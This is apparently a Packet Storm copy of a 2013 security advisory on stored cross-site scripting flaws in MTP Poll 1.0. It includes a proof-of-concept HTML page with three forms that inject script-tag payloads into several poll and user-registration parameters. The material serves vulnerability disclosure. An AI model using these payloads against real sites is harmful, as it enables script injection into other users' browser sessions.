MTP Poll 1.0 Cross Site Scripting

2013-02-25T00:00:00
ID PACKETSTORM:120533
Type packetstorm
Reporter LiquidWorm
Modified 2013-02-25T00:00:00

Description

                                        
                                            `<!--  
  
MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities  
  
  
Vendor: MTP Scripts  
Product web page: http://www.morephp.net  
Affected version: 1.0  
  
Summary: More than poll is a polling system with a powerful  
administration tool. It features: multiple pools, templates,  
unlimited options, IP Logging, cookie support, and more.  
  
Desc: MTP Poll script suffers from multiple stored cross-site scripting  
vulnerabilities. The issues are triggered when input passed via several  
parameters to several scripts is not properly sanitized before being returned  
to the user. This can be exploited to execute arbitrary HTML and script code  
in a user's browser session in context of an affected site.  
  
Tested on: Linux, Apache2  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2013-5132  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php  
  
  
17.02.2013  
  
-->  
  
<html>  
<head>  
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>  
</head>  
<body><center>  
<form method="POST" action="http://localhost/poll_script/poll_add.php">  
<input type="hidden" name="question" value='"><script>alert(1);</script>' />  
<input type="hidden" name="color[]" value="#8bc6e1" />  
<input type="hidden" name="answer[]" value='"><script>alert(2);</script>' />  
<input type="hidden" name="img[]" value="" />  
<input type="hidden" name="status" value="1" />  
<input type="hidden" name="cat" value="0" />  
<input type="hidden" name="action" value="add" />  
<input type="submit" value="XSS #1" />  
</form>  
<br /><br />  
<form method="POST" action="http://localhost/poll_script/insert_user.php">  
<input type="hidden" name="ins_city" value='"><script>alert(3);</script>' />  
<input type="hidden" name="ins_country" value="MK" />  
<input type="hidden" name="ins_email" value="lab@zeroscience.mk" />  
<input type="hidden" name="ins_fname" value='"><script>alert(4);</script>' />  
<input type="hidden" name="ins_pass" value="thricerpass" />  
<input type="hidden" name="ins_username" value="thricer" />  
<input type="submit" value="XSS #2" />  
</form>  
<br /><br />  
<form method="POST" action="http://localhost/poll_script/ajax_cat_ins.php">  
<input type="hidden" name="name" value='"><script>alert(5);</script>' />  
<input type="submit" value="XSS #3" />  
</form>  
</center></body>  
</html>  
`